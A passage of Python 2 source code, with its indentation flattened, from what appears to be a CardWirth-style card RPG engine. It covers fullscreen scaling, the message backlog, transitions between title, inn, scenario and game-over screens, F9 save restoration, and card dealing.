self.exec_func(self.set_expanded, flag, expandmode, force, dsize)
self.frame.exec_func(func)
return
updatedrawsize = force or self.setting.expanddrawing != 1
if expandmode == "None":
if force:
self.set_fullscreen(False)
self.expand_mode = "None"
self.setting.is_expanded = False
cw.UP_WIN = 1
cw.UP_WIN_M = cw.UP_WIN
self.update_scale(1, True, False, updatedrawsize)
self.clear_inputevents()
else:
return
elif expandmode == "FullScreen":
# Fullscreen
if self.is_showingdebugger() and flag:
self.play_sound("error")
s = u"デバッガ表示中はフルスクリーン化できません。"
self.call_modaldlg("MESSAGE", text=s)
else:
pos = pygame.mouse.get_pos()
pygame.mouse.set_pos([-1, -1])
self.setting.is_expanded = flag
if flag:
assert not displaysize is None
self.expand_mode = expandmode
dsize = displaysize
self.scr_fullscreen = pygame.display.set_mode((dsize[0], dsize[1]), 0)
self.scr = pygame.Surface(cw.s(cw.SIZE_GAME)).convert()
self.scr_draw = self.scr
self.set_fullscreen(True)
self.update_scale(self.setting.expanddrawing, True, False, updatedrawsize)
else:
cw.UP_WIN = 1
cw.UP_WIN_M = cw.UP_WIN
self.expand_mode = "None"
self.scr_fullscreen = None
self.scr = pygame.display.set_mode(cw.wins(cw.SIZE_GAME), 0)
self.scr_draw = self.scr
self.set_fullscreen(False)
self.update_scale(1, True, False, updatedrawsize)
while not self.frame.IsFullScreen() == flag:
pass
# Unless the mouse pointer is moved off-screen once,
# focus may be lost
pygame.mouse.set_pos(pos)
self.clear_inputevents()
else:
# Scale-factor expansion
try:
def func():
self.set_fullscreen(False)
self.frame.exec_func(func)
scale = float(expandmode)
scale = max(scale, 0.5)
self.setting.is_expanded = flag
if flag:
self.expand_mode = expandmode
cw.UP_WIN = scale
cw.UP_WIN_M = cw.UP_WIN
self.update_scale(self.setting.expanddrawing, True, False, updatedrawsize)
else:
self.expand_mode = "None"
cw.UP_WIN = 1
cw.UP_WIN_M = cw.UP_WIN
self.update_scale(1, True, False, updatedrawsize)
self.clear_inputevents()
except Exception:
cw.util.print_ex()
self.has_inputevent = True
def show_message(self, mwin):
"""MessageWindowを表示し、次コンテントのindexを返す。
mwin: MessageWindowインスタンス。
"""
eventhandler = cw.eventhandler.EventHandlerForMessageWindow(mwin)
self.clear_selection()
locks = self.lock_menucards
self.lock_menucards = False
if self.is_showingdebugger() and self.event and self.event.is_stepexec():
self.event.refresh_tools()
self.event.refresh_activeitem()
self.input()
while self.is_running() and mwin.result is None:
self.update()
if mwin.result is None:
self.input()
self.draw(not mwin.is_drawing or self.has_inputevent)
self.tick_clock()
self.input()
eventhandler.run()
self.clear_selection()
self.lock_menucards = locks
# Save to the message backlog
if self.is_playingscenario() and self.setting.backlogmax and isinstance(mwin.result, int) and\
not isinstance(mwin, cw.sprite.message.MemberSelectWindow):
if self.setting.backlogmax <= len(self.sdata.backlog):
self.sdata.backlog.pop(0)
self.sdata.backlog.append(cw.sprite.message.BacklogData(mwin))
self.advlog.show_message(mwin)
self.statusbar.change(False)
# reset cwpy list and index
self.list = self.get_mcards("visible")
self.index = -1
# Remove the message sprites
seq = []
seq.extend(self.cardgrp.remove_sprites_of_layer(cw.LAYER_MESSAGE))
seq.extend(self.cardgrp.remove_sprites_of_layer(cw.LAYER_SPMESSAGE))
seq.extend(self.cardgrp.remove_sprites_of_layer(cw.LAYER_SELECTIONBAR_1))
seq.extend(self.cardgrp.remove_sprites_of_layer(cw.LAYER_SPSELECTIONBAR_1))
seq.extend(self.cardgrp.remove_sprites_of_layer(cw.LAYER_SELECTIONBAR_2))
seq.extend(self.cardgrp.remove_sprites_of_layer(cw.LAYER_SPSELECTIONBAR_2))
seq.extend(self.sbargrp.remove_sprites_of_layer(cw.sprite.statusbar.LAYER_MESSAGE))
# Remove the compatibility mark
if self.is_playingscenario():
self.sdata.set_versionhint(cw.HINT_MESSAGE, None)
# Redraw before the next animation
for sprite in seq:
self.add_lazydraw(sprite.rect)
self.set_lazydraw()
# If the scenario was force-terminated (F9, etc.) while a message
# was displayed, raise the error that aborts the running event.
if isinstance(mwin.result, Exception):
raise mwin.result
else:
return mwin.result
def has_backlog(self):
"""表示可能なメッセージログがあるか。"""
return bool(self.sdata.backlog)
def show_backlog(self, n=0):
"""直近から過去に遡ってn回目のメッセージを表示する。
n: 遡る量。0なら最後に閉じたメッセージ。
もっとも古いメッセージよりも大きな値の場合は
もっとも古いメッセージを表示する。
"""
if not self.has_backlog():
return
length = len(self.sdata.backlog)
if length <= n:
n = length - 1
index = length - 1 - n
eventhandler = cw.eventhandler.EventHandlerForBacklog(self.sdata.backlog, index)
cursor = self.cursor
self.change_cursor()
self._log_handler = eventhandler
try:
while self.is_running() and eventhandler.is_showing() and\
cw.cwpy.sdata.is_playing and self._is_showingbacklog:
self.sbargrp.update(self.scr_draw)
if self.has_inputevent:
self.draw()
self.tick_clock()
self.input()
eventhandler.run()
if len(self.sdata.backlog) < length:
# The log shrank because the maximum-size setting was changed
if not self.sdata.backlog:
break
eventhandler.index -= length - len(self.sdata.backlog)
length = len(self.sdata.backlog)
if eventhandler.index < 0:
eventhandler.index = 0
eventhandler.update_sprites()
finally:
self._log_handler = None
self.change_cursor(cursor)
# End of display
eventhandler.exit_backlog(playsound=False)
def set_backlogmax(self, backlogmax):
"""メッセージログの最大数を設定する。
"""
self.setting.backlogmax = backlogmax
if not self.has_backlog():
return
if backlogmax < len(self.sdata.backlog):
del self.sdata.backlog[0:len(self.sdata.backlog)-backlogmax]
def set_titlebar(self, s):
"""タイトルバーテキストを設定する。
s: タイトルバーテキスト。
"""
self.frame.exec_func(self.frame.SetTitle, s)
def get_yesnoresult(self):
"""call_yesno()の戻り値を取得する。"""
return self._yesnoresult
#-------------------------------------------------------------------------------
# Game state transition methods
#-------------------------------------------------------------------------------
def set_status(self, name):
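"""Switch the top-level game status (e.g. "Title", "Yado",
"Scenario"), hiding the current cards and resetting the stored
pre-area/dialog state. (Summary inferred from the body below.)"""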
isbattle = "ScenarioBattle" in (name, self.status)
quickhide = (self.setting.all_quickdeal and not isbattle)
self.status = name
force_dealspeed = self.force_dealspeed
if quickhide:
self.force_dealspeed = self.setting.dealspeed if self.setting.quickdeal else -1
try:
self.hide_cards(True, quickhide=quickhide)
finally:
self.force_dealspeed = force_dealspeed
self.pre_areaids = []
self.pre_dialogs = []
self.pre_mcards = []
def startup(self, loadyado=True):
"""起動時のアニメーションを表示してから
タイトル画面へ遷移する。"""
resdir = cw.util.join_paths(cw.cwpy.skindir, u"Resource/Image/Other")
seq = []
for event in self.events:
if event.type == pygame.locals.USEREVENT:
seq.append(event)
self.events = seq
self.cut_animation = False
self.wait_showcards = False
# Load the required sprites
if not self._init_resources():
self._running = False
return
for music in self.music:
music.stop()
optyado = cw.OPTIONS.yado
cw.OPTIONS.yado = ""
if not optyado and self.setting.startupscene == cw.setting.OPEN_LAST_BASE and loadyado:
optyado = self.setting.lastyado
cw.OPTIONS.party = ""
cw.OPTIONS.scenario = ""
if optyado:
if os.path.isabs(optyado):
optyado = cw.util.relpath(optyado, u"Yado")
optyado = cw.util.join_paths(u"Yado", optyado)
env = cw.util.join_paths(optyado, "Environment.xml")
if os.path.isfile(env):
self.set_status("Title")
self._init_attrs()
if self.load_yado(optyado):
return
else:
name = cw.header.GetName(env).name
s = u"「%s」は他の起動で使用中です。" % (name)
self.call_modaldlg("MESSAGE", text=s)
# If the yado specified by the startup option failed to load,
# these options are disabled
cw.OPTIONS.party = ""
cw.OPTIONS.scenario = ""
self.sdata = cw.data.SystemData()
self.statusbar.change()
try:
fpath = cw.util.join_paths(self.skindir, u"Resource/Xml/Animation/Opening.xml")
anime = cw.sprite.animationcell.AnimationCell(fpath, cw.SIZE_AREA, (0, 0), self.topgrp, "title")
self.draw()
cw.animation.animate_sprite(anime, "animation", clearevent=False)
# Remove the title sprites
self.topgrp.remove_sprites_of_layer("title")
if self.cut_animation:
ttype = ("Default", "Default")
self.cut_animation = False
else:
ttype = ("None", "None")
self.wait_showcards = True
self.set_title(ttype=ttype)
except cw.event.EffectBreakError:
# Aborted by switching to another skin, etc.
self.topgrp.remove_sprites_of_layer("title")
def set_title(self, init=True, ttype=("Default", "Default")):
"""タイトル画面へ遷移。"""
del self.pre_dialogs[:]
del self.pre_areaids[:]
if self.ydata and self.ydata.losted_sdata:
self.ydata.losted_sdata.end(failure=True)
self.ydata.losted_sdata = None
self.load_party(None, chgarea=False)
elif self.ydata and self.ydata.party:
self.load_party(None, chgarea=False)
if isinstance(self.sdata, cw.data.SystemData):
self.sdata.save_variables()
self.set_status("Title")
self._init_attrs()
self.update_titlebar()
self.statusbar.change()
self.change_area(1, ttype=ttype)
def _init_attrs(self):
self.background.clear_background()
for i in xrange(len(self.lastsound_scenario)):
if self.lastsound_scenario[i]:
self.lastsound_scenario[i].stop(True)
self.lastsound_scenario[i] = None
cw.util.remove_temp()
self.yadodir = ""
self.tempdir = ""
self.setting.scenario_narrow = ""
self.setting.lastscenario = []
self.setting.lastscenariopath = ""
self.setting.last_storehousepage = 0
self.setting.last_backpackpage = 0
self.ydata = None
self.sdata = cw.data.SystemData()
cw.tempdir = cw.tempdir_init
cw.util.release_mutex()
def set_yado(self):
"""宿画面へ遷移。"""
# ゲームオーバーしたパーティの破棄処理を行う
if self.ydata and self.ydata.losted_sdata:
self.ydata.party.lost()
self.ydata.losted_sdata.end()
self.ydata.losted_sdata = None
self.load_party(None, chgarea=False)
self.set_status("Yado")
self.background.clear_background()
msglog = self.sdata.backlog
self.sdata = cw.data.SystemData()
self.sdata.load_variables()
self.sdata.backlog = msglog
self.update_titlebar()
# Clear the curtain for adventure interruption and F9
self.clear_curtain()
self.statusbar.change()
if self.ydata.party:
# A party is selected
areaid = 2
self.ydata.party.remove_numbercoupon()
for pcard in self.get_pcards():
pcard.clear_action()
# Handle defeat by removal of all members leading
# directly to scenario completion
if not self.ydata.party.members:
self.dissolve_party()
areaid = 1
elif not self.ydata.is_empty() or self.ydata.is_changed():
# No party is selected
areaid = 1
else:
# Initial state
areaid = 3
def change_area():
self.change_area(areaid, force_updatebg=True)
self.is_pcardsselectable = self.ydata and self.ydata.party
if self.ydata.skindirname != cw.cwpy.setting.skindirname:
self.update_skin(self.ydata.skindirname, changearea=False, afterfunc=change_area)
else:
change_area()
def start_scenario(self):
"""
シナリオ選択ダイアログで選択されたシナリオがあればスタートする。
"""
if self.selectedscenario:
self.set_scenario(self.selectedscenario, manualstart=True)
self.selectedscenario = None
def set_scenario(self, header=None, lastscenario=[][:], lastscenariopath="",
resume=False, manualstart=False):
"""シナリオ画面へ遷移。
header: ScenarioHeader
"""
self.is_processing = True
self.set_status("Scenario")
self.battle = None
if self.ydata.skindirname != cw.cwpy.setting.skindirname:
def func():
self._set_scenario_impl(header, lastscenario, lastscenariopath, resume, manualstart)
self.update_skin(self.ydata.skindirname, changearea=False, afterfunc=func)
else:
self._set_scenario_impl(header, lastscenario, lastscenariopath, resume, manualstart)
def _set_scenario_impl(self, header, lastscenario, lastscenariopath, resume, manualstart):
if header and not isinstance(self.sdata, cw.data.ScenarioData):
def load_failure(showerror):
# Loading failed (return to the yado)
self.is_processing = False
if showerror:
s = u"シナリオの読み込みに失敗しました。"
self.call_modaldlg("ERROR", text=s)
if isinstance(self.sdata, cw.data.ScenarioData):
self.sdata.end(failure=True)
self.set_yado()
if self.is_showingdebugger() and self.event:
self.event.refresh_variablelist()
try:
if isinstance(self.sdata, cw.data.SystemData):
self.sdata.save_variables()
self.sdata = cw.data.ScenarioData(header)
if cw.cwpy.ydata:
cw.cwpy.ydata.changed()
self.statusbar.change(False)
loaded, musicpaths = self.sdata.set_log()
self.sdata.start()
self.update_titlebar()
areaid = self.sdata.startid
if lastscenario or lastscenariopath:
self.ydata.party.set_lastscenario(lastscenario, lastscenariopath)
if not loaded:
self.ydata.party.set_numbercoupon()
def func(loaded, musicpaths, areaid):
self.is_processing = False
quickdeal = resume and self.setting.all_quickdeal
try:
name = self.sdata.get_areaname(self.sdata.startid)
if name is None:
if resume:
# Loading failed on resume
load_failure(True)
return
# The start area does not exist (return to the yado)
s = u"シナリオに開始エリアが設定されていません。"
self.call_modaldlg("ERROR", text=s)
self.check_level(True)
self.sdata.end(failure=True)
self.set_yado()
return
if manualstart:
dataversion = self.sdata.summary.getattr(".", "dataVersion", "")
if not dataversion in cw.SUPPORTED_WSN:
s = u"対応していないWSNバージョン(%s)のシナリオです。\n正常に動作しない可能性がありますが、開始しますか?" % (dataversion)
self.call_modaldlg("YESNO", text=s)
if self.get_yesnoresult() != wx.ID_OK:
self.sdata.end(failure=True)
self.set_yado()
return
if not resume:
for pcard in self.get_pcards():
pcard.set_fullrecovery()
pcard.update_image()
if musicpaths:
for i, (musicpath, _subvolume, _loopcount, inusecard) in enumerate(musicpaths):
music = self.music[i]
if music.path != music.get_path(musicpath, inusecard):
music.stop()
force_dealspeed = self.force_dealspeed
if quickdeal:
self.force_dealspeed = self.setting.dealspeed if self.setting.quickdeal else -1
try:
self.change_area(areaid, not loaded, loaded, quickdeal=quickdeal, doanime=not resume, resume=True)
finally:
self.force_dealspeed = force_dealspeed
if musicpaths:
for i, (musicpath, subvolume, loopcount, inusecard) in enumerate(musicpaths):
music = self.music[i]
music.play(musicpath, subvolume=subvolume, loopcount=loopcount, inusecard=inusecard)
if self.is_showingdebugger() and self.event:
self.event.refresh_variablelist()
if not self.setting.lastscenariopath:
self.setting.lastscenariopath = header.get_fpath()
except:
# Loading failed (return to the yado)
cw.util.print_ex()
self.exec_func(load_failure, True)
self.clear_inputevents()
self.exec_func(func, loaded, musicpaths, areaid)
except cw.event.EffectBreakError:
# Aborted manually
if not self.is_runningstatus():
return
self.exec_func(load_failure, False)
except:
if not self.is_runningstatus():
return
# Loading failed (return to the yado)
cw.util.print_ex()
self.exec_func(load_failure, True)
else:
self.statusbar.change(False)
self.is_processing = False
self.is_pcardsselectable = self.ydata and self.ydata.party
def set_battle(self):
"""シナリオ戦闘画面へ遷移。"""
self.set_status("ScenarioBattle")
def set_gameover(self):
"""ゲームオーバー画面へ遷移。"""
cw.cwpy.advlog.gameover()
self.hide_party()
self.set_status("GameOver")
del self.pre_dialogs[:]
del self.pre_areaids[:]
self._gameover = False
self._forcegameover = False
self.battle = None
self.card_takenouttemporarily = None
self.clear_inputevents()
pygame.event.clear()
if self._need_disposition:
self.disposition_pcards()
del self.sdata.friendcards[:]
for music in self.music:
music.stop()
for i in xrange(len(self.lastsound_scenario)):
if self.lastsound_scenario[i]:
self.lastsound_scenario[i].stop(True)
self.lastsound_scenario[i] = None
self.ydata.losted_sdata = self.sdata
self.sdata = cw.data.SystemData()
if isinstance(self.sdata, cw.data.SystemData):
self.sdata.load_variables()
self.sdata.backlog = self.ydata.losted_sdata.backlog
self.update_titlebar()
self.statusbar.change()
self.change_area(1, nocheckvisible=True)
def set_gameoverstatus(self, gameover, force=True):
"""パーティの状態に係わらず
現状のゲームオーバー状態を設定する。
"""
self._gameover = gameover
if force:
self._forcegameover = gameover
def f9(self, load_failure=False, loadyado=False):
"""cw.data.ScenarioDataのf9()から呼び出され、
緊急避難処理の続きを行う。
"""
if not load_failure and not self.is_playingscenario():
return
if self.sdata.in_endprocess:
return
self.clean_specials()
def func():
if cw.cwpy.is_runningevent():
self.exec_func(self._f9impl, False, loadyado)
raise cw.event.EffectBreakError()
else:
self._f9impl(False, loadyado)
self.exec_func(func)
def _f9impl(self, startotherscenario=False, loadyado=False):
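"""Implementation of the F9 emergency evacuation: abort any running
battle, restore the party, member and backpack data from the
ScenarioLog snapshot, rebuild the player card sprites, and finally
return to the yado. (Summary inferred from the body below.)"""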
if self.sdata.in_endprocess:
return
self.sdata.in_endprocess = True
self.advlog.f9()
self.sdata.is_playing = False
self.statusbar.change(False)
self.pre_dialogs = []
self.clear_inusecardimg()
self.clear_guardcardimg()
self.statusbar.change(False)
self.draw(clip=self.statusbar.rect)
self.return_takenoutcard(checkevent=False)
# Even if F9 is pressed on the target-selection screen, do not carry the cancel button over to the yado
self.selectedheader = None
# If the special-character dictionary was changed, restore it
if self.rsrc.specialchars_is_changed:
self.rsrc.specialchars = self.rsrc.get_specialchars()
# battle
if self.battle and self.battle.is_running:
# Force-terminate the battle
self.battle.end(True, True)
self.battle = None
# party copy
fname = os.path.basename(self.ydata.party.data.fpath)
dname = os.path.basename(os.path.dirname(self.ydata.party.data.fpath))
path = cw.util.join_paths(cw.tempdir, "ScenarioLog/Party", fname)
dstpath = cw.util.join_paths(self.ydata.tempdir, "Party", dname, fname)
dpath = os.path.dirname(dstpath)
if not os.path.isdir(dpath):
os.makedirs(dpath)
shutil.copy2(path, dstpath)
# member copy
dpath = cw.util.join_paths(cw.tempdir, u"ScenarioLog/Members")
for name in os.listdir(dpath):
path = cw.util.join_paths(dpath, name)
if os.path.isfile(path) and path.endswith(".xml"):
dstpath = cw.util.join_paths(self.ydata.tempdir,
"Adventurer", name)
dstdir = os.path.dirname(dstpath)
if not os.path.isdir(dstdir):
os.makedirs(dstdir)
shutil.copy2(path, dstpath)
# Unless the compatibility option that disables restoration is enabled,
# remove added gossips/end marks and re-add removed ones
if not cw.cwpy.setting.enable_oldf9:
# gossips
for key, value in self.sdata.gossips.iteritems():
if value:
self.ydata.remove_gossip(key)
else:
self.ydata.set_gossip(key)
# completestamps
for key, value in self.sdata.compstamps.iteritems():
if value:
self.ydata.remove_compstamp(key)
else:
self.ydata.set_compstamp(key)
# scenario
self.ydata.party.set_lastscenario([], u"")
# members
self.ydata.party.data = cw.data.yadoxml2etree(self.ydata.party.data.fpath)
self.ydata.party.reload()
# Restore the backpack data
path = cw.util.join_paths(cw.tempdir, u"ScenarioLog/Backpack.xml")
etree = cw.data.xml2etree(path)
backpacktable = {}
yadodir = self.ydata.party.get_yadodir()
tempdir = self.ydata.party.get_tempdir()
for header in itertools.chain(self.ydata.party.backpack, self.ydata.party.backpack_moved):
if header.scenariocard:
header.contain_xml()
header.remove_importedmaterials()
continue
if header.fpath.lower().startswith("yado"):
fpath = cw.util.relpath(header.fpath, yadodir)
else:
fpath = cw.util.relpath(header.fpath, tempdir)
fpath = cw.util.join_paths(fpath)
backpacktable[fpath] = header
self.ydata.party.backpack = []
self.ydata.party.backpack_moved = []
for i, e in enumerate(etree.getfind(".")):
try:
header = backpacktable[e.text]
del backpacktable[e.text]
if header.moved != 0:
# Remove the deletion flag; if the F9 option is enabled, simply delete.
# A card that was moved out of the backpack may have
# been used, so overwrite it
if header.carddata is None:
etree = cw.data.yadoxml2etree(header.fpath)
etree.remove("Property", attrname="moved")
etree.write_xml()
else:
etree = cw.data.yadoxml2etree(path=header.fpath)
etree.remove("Property", attrname="moved")
header2 = cw.header.CardHeader(carddata=etree.getroot())
header2.fpath = header.fpath
header2.write()
header = header2
header.moved = 0
self.ydata.party.backpack.append(header)
header.order = i
header.set_owner("BACKPACK")
# While in the backpack there is no carddata and no skill use count
header.carddata = None
if header.type == "SkillCard":
header.maxuselimit = 0
header.uselimit = 0
except Exception:
cw.util.print_ex()
# Cards that were taken out of the backpack and later
# returned remain in backpacktable
for fpath, header in backpacktable.iteritems():
cw.cwpy.ydata.deletedpaths.add(header.fpath)
if self.areaid < 0:
self.areaid = self.pre_areaids[0][0]
# Rebuild the sprites
pcards = self.get_pcards()
showparty = bool(self.pcards)
if showparty:
for music in self.music:
music.stop()
logpath = cw.util.join_paths(cw.tempdir, u"ScenarioLog/Face/Log.xml")
if os.path.isfile(logpath):
elog = cw.data.xml2etree(logpath)
else:
elog = None
if loadyado and not self.is_showparty:
# Play the party-appearance animation only when returning
# together with loading the yado after a scenario load failure
status = "hidden"
else:
status = "normal"
for idx, data in enumerate(self.ydata.party.members):
if idx < len(pcards):
pcard = pcards[idx]
self.cardgrp.remove(pcard)
self.pcards.remove(pcard)
pos_noscale = (95 * idx + 9 * (idx + 1), 285)
pcard = cw.sprite.card.PlayerCard(data, pos_noscale=pos_noscale, status=status, index=idx)
# Restore PCs whose card image was changed
if not elog is None:
name = os.path.splitext(os.path.basename(data.fpath))[0]
for eimg in elog.getfind(".", raiseerror=False):
if eimg.get("member", "") == name:
prop = data.find("Property")
for ename in ("ImagePath", "ImagePaths"):
e = prop.find(ename)
if not e is None:
prop.remove(e)
if eimg.tag == "ImagePath":
# Old format (up to 0.12.3)
fname = eimg.get("path", "")
if fname:
face = cw.util.join_paths(cw.tempdir, u"ScenarioLog/Face", fname)
else:
face = ""
# Re-set the image here so that the changed image is removed
# (it is deleted inside set_images())
prop.append(cw.data.make_element("ImagePath", eimg.text))
if os.path.isfile(face):
postype = eimg.get("positiontype", "Default")
pcard.set_images([cw.image.ImageInfo(face, postype=postype)])
else:
pcard.set_images([])
elif eimg.tag == "ImagePaths":
# New format (after multiple-image support)
seq = cw.image.get_imageinfos(eimg)
for info in seq:
info.path = cw.util.join_paths(cw.tempdir, u"ScenarioLog/Face", info.path)
# Re-set the image here so that the changed image is removed
# (it is deleted inside set_images())
e = cw.data.make_element("ImagePaths")
prop.append(e)
for e2 in eimg:
if e2.tag == "NewImagePath":
e.append(cw.data.make_element("ImagePath", e2.text))
pcard.set_images(seq)
break
pcard.set_pos_noscale(pos_noscale)
pcard.set_fullrecovery()
pcard.update_image()
self.sdata.remove_log()
self.ydata.party._loading = False
if not self.is_showparty and not loadyado:
self._show_party()
self.background.clear_background()
for music in self.music:
music.stop()
for i in xrange(len(self.lastsound_scenario)):
if self.lastsound_scenario[i]:
self.lastsound_scenario[i].stop(True)
self.lastsound_scenario[i] = None
if self.lastsound_system:
self.lastsound_system.stop(False)
self.lastsound_system = None
if not startotherscenario:
self.set_yado()
def reload_yado(self):
"""現在の宿をロード。"""
# イベントを中止
self.event._stoped = True
self.event.breakwait = True
self.lock_menucards = True
del self.pre_dialogs[:]
del self.pre_areaids[:]
def return_title():
def func():
for i in xrange(len(self.lastsound_scenario)):
if self.lastsound_scenario[i]:
self.lastsound_scenario[i].stop(True)
self.lastsound_scenario[i] = None
self.set_status("Title")
self.sdata = cw.data.SystemData()
cw.util.remove_temp()
self.load_yado(self.yadodir, createmutex=False)
def func():
def func():
self.is_debuggerprocessing = False
if self.is_showingdebugger() and self.event:
self.event.refresh_tools()
self.frame.exec_func(func)
self.lock_menucards = False
self.exec_func(func)
self.exec_func(func)
def init_resources():
self.event.clear()
self._init_resources()
self.frame.exec_func(return_title)
def end_scenario():
# Force-terminate the scenario
if self.ydata and self.ydata.losted_sdata:
self.ydata.losted_sdata.end(failure=True)
self.ydata.losted_sdata = None
elif self.is_playingscenario():
self.sdata.end(failure=True)
self.sdata.is_playing = False
self.exec_func(init_resources)
if self.is_decompressing:
raise cw.event.EffectBreakError()
def func1():
if self.is_showingmessage():
mwin = self.get_messagewindow()
mwin.result = cw.event.EffectBreakError()
self.event._stoped = True
elif self.is_runningevent():
self.event._stoped = True
# Force-terminate the battle
if self.battle and self.battle.is_running:
self.battle.end(True, True)
self.exec_func(end_scenario)
self.exec_func(func1)
def load_yado(self, yadodir, createmutex=True):
"""指定されたディレクトリの宿をロード。"""
try:
return self._load_yado(yadodir, createmutex)
except Exception, ex:
cw.util.print_ex(file=sys.stderr)
cw.tempdir = cw.tempdir_init
self.yadodir = ""
self.tempdir = ""
self.setting.scenario_narrow = ""
self.setting.lastscenario = []
self.setting.lastscenariopath = ""
self.ydata = None
self.sdata = cw.data.SystemData()
raise ex
def _load_yado(self, yadodir, createmutex):
if createmutex:
if cw.util.create_mutex(u"Yado"):
if cw.util.create_mutex(yadodir):
try:
cw.tempdir = cw.util.join_paths(u"Data/Temp/Local", yadodir)
return self._load_yado2(yadodir)
finally:
cw.util.release_mutex(-2)
else:
cw.util.release_mutex()
cw.cwpy.play_sound("error")
return False
else:
cw.cwpy.play_sound("error")
return False
else:
return self._load_yado2(yadodir)
def _load_yado2(self, yadodir):
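"""Second stage of yado loading: stop sounds, build YadoData and,
depending on the party state and the scenario startup option,
resume a scenario or switch to the yado screen.
(Summary inferred from the body below.)"""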
del self.pre_dialogs[:]
del self.pre_areaids[:]
optscenario = cw.OPTIONS.scenario
cw.OPTIONS.scenario = ""
yadodirname = os.path.basename(yadodir)
self.yadodir = yadodir.replace("\\", "/")
self.tempdir = self.yadodir.replace("Yado", cw.util.join_paths(cw.tempdir, u"Yado"), 1)
for music in self.music:
music.stop()
for i in xrange(len(self.lastsound_scenario)):
if self.lastsound_scenario[i]:
self.lastsound_scenario[i].stop(True)
self.lastsound_scenario[i] = None
if self.ydata and isinstance(self.sdata, cw.data.SystemData):
self.sdata.save_variables()
self.ydata = cw.data.YadoData(self.yadodir, self.tempdir)
self.setting.lastyado = yadodirname
self.setting.insert_yadoorder(yadodirname)
if self.ydata.party:
header = self.ydata.party.get_sceheader()
if optscenario:
if os.path.isabs(optscenario):
scedir = optscenario
else:
scedir = cw.cwpy.setting.get_scedir()
scedir = cw.util.join_paths(scedir, optscenario)
db = self.frame.open_scenariodb()
header2 = db.search_path(scedir)
if header2:
if header:
scepath1 = header.get_fpath()
scepath1 = os.path.normcase(os.path.normpath(os.path.abspath(scepath1)))
scepath2 = header2.get_fpath()
scepath2 = os.path.normcase(os.path.normpath(os.path.abspath(scepath2)))
if header and scepath1 != scepath2:
self.sdata.set_log()
self.ydata.party.lastscenario = []
self.ydata.party.lastscenariopath = optscenario
self.setting.lastscenario = []
self.setting.lastscenariopath = optscenario
self._f9impl(startotherscenario=True)
else:
for idx, data in enumerate(self.ydata.party.members):
pos_noscale = (95 * idx + 9 * (idx + 1), 285)
pcard = cw.sprite.card.PlayerCard(data, pos_noscale=pos_noscale, status="normal", index=idx)
pcard.set_pos_noscale(pos_noscale)
pcard.set_fullrecovery()
pcard.update_image()
self.ydata.party._loading = False
self.ydata.party.lastscenario = []
self.ydata.party.lastscenariopath = optscenario
self.setting.lastscenario = []
self.setting.lastscenariopath = optscenario
self._show_party()
header = header2
# Resume a scenario that was in progress
if header:
self.exec_func(self.set_scenario, header, resume=True)
# Scenario load failed
elif self.ydata.party.is_adventuring():
self.play_sound("error")
s = (cw.cwpy.msgs["load_scenario_failure"])
self.call_modaldlg("YESNO", text=s)
if self.get_yesnoresult() == wx.ID_OK:
self.exec_func(self.sdata.set_log)
self.exec_func(self.f9, True, True)
else:
self.exec_func(self.ydata.load_party, None)
self.exec_func(self.set_yado)
else:
self.exec_func(self.set_yado)
if self.is_showingdebugger():
func = self.frame.debugger.refresh_tools
self.frame.exec_func(func)
else:
self.exec_func(self.set_yado)
self._clear_changed = True
return True
#-------------------------------------------------------------------------------
# Area change methods
#-------------------------------------------------------------------------------
def deal_cards(self, quickdeal=False, updatelist=True, flag="", startbattle=False):
"""hidden状態のMenuCard(対応フラグがFalseだったら表示しない)と
PlayerCardを全て表示する。
quickdeal: 全カードを同時に表示する。
"""
if not (self.setting.quickdeal or self.setting.all_quickdeal):
quickdeal = False
self.force_dealspeed = -1
self._dealing = True
if self.is_autospread():
mcardsinv = self.get_mcards("invisible")
else:
mcardsinv = self.get_mcards("invisible", flag=flag)
# Enemy cards may not be initialized yet
for mcard in mcardsinv[:]:
if isinstance(mcard, cw.sprite.card.EnemyCard):
if mcard.is_flagtrue():
if not mcard.initialize():
mcardsinv.remove(mcard)
# Recompute the positions for automatic card placement
if self.is_autospread():
mcards = self.get_mcards("flagtrue")
flag = bool(self.areaid == cw.AREA_CAMP and self.sdata.friendcards)
if self.is_battlestatus():
self.set_autospread(mcards, 6, flag, anime=False)
else:
self.set_autospread(mcards, 7, flag, anime=False)
deals = []
for mcard in mcardsinv:
if mcard.is_flagtrue():
self._fix_updateimage(mcard)
if quickdeal:
deals.append(mcard)
else:
cw.animation.animate_sprite(mcard, "deal")
if self.is_playingscenario() and self.sdata.in_f9:
# We get here if F9 was pressed while cards were being drawn
return
if deals and quickdeal:
cw.animation.animate_sprites(deals, "deal")
# set list and index
if updatelist:
self._update_mcardlist()
else:
self._after_update_mcardlist = True
self.input(True)
self._dealing = False
self.wait_showcards = False
def hide_cards(self, hideall=False, hideparty=True, quickhide=False, updatelist=True, flag=""):
"""
カードを非表示にする(表示中だったカードはhidden状態になる)。
各カードのhidecards()の最後に呼ばれる。
hideallがTrueだった場合、全てのカードを非表示にする。
"""
if not (self.setting.quickdeal or self.setting.all_quickdeal):
quickhide = False
self.force_dealspeed = -1
self._dealing = True
if updatelist:
# Clear the selection
self.clear_selection()
# Put away the menu cards
if self.is_autospread():
mcards = self.get_mcards("visible")
else:
mcards = self.get_mcards("visible", flag=flag)
hide = False
for mcard in mcards:
if hideall or not mcard.is_flagtrue():
self._fix_updateimage(mcard)
if mcard.inusecardimg:
self.clear_inusecardimg(mcard)
if quickhide:
hide = True
else:
cw.animation.animate_sprite(mcard, "hide")
if isinstance(mcard, cw.character.Character):
mcard.clear_action()
if hide:
cw.animation.animate_sprites(mcards, "hide")
# Put away the player cards
if self.ydata and hideparty:
if not self.ydata.party or self.ydata.party.is_loading():
self.draw(clip=self.statusbar.rect)
self.hide_party()
# set list and index
if updatelist:
self._update_mcardlist()
else:
self._after_update_mcardlist = True
self.input(True)
self._dealing = False
def _fix_updateimage(self, mcard):
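"""Flush a menu card's extended image cache so that updated PC
images are picked up the next time the card is dealt."""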
if mcard.is_initialized():
if mcard.cardimg.use_excache:
mcard.cardimg.clear_cache()
mcard.cardimg.fix_pcimage_updated()
self.file_updates.discard(mcard)
mcard.cardimg.use_excache = False
def vanished_card(self, mcard):
"""mcardの対象消去を通知する。"""
if isinstance(mcard, (cw.sprite.card.MenuCard, cw.sprite.card.EnemyCard)) and mcard.flag:
seq = self._mcardtable.get(mcard.flag, [])
if seq and mcard in seq:
seq.remove(mcard)
if not seq:
del self._mcardtable[mcard.flag]
if isinstance(mcard, cw.sprite.card.PlayerCard):
self._need_disposition = True
self.update_mcardnames()
def update_mcardlist(self):
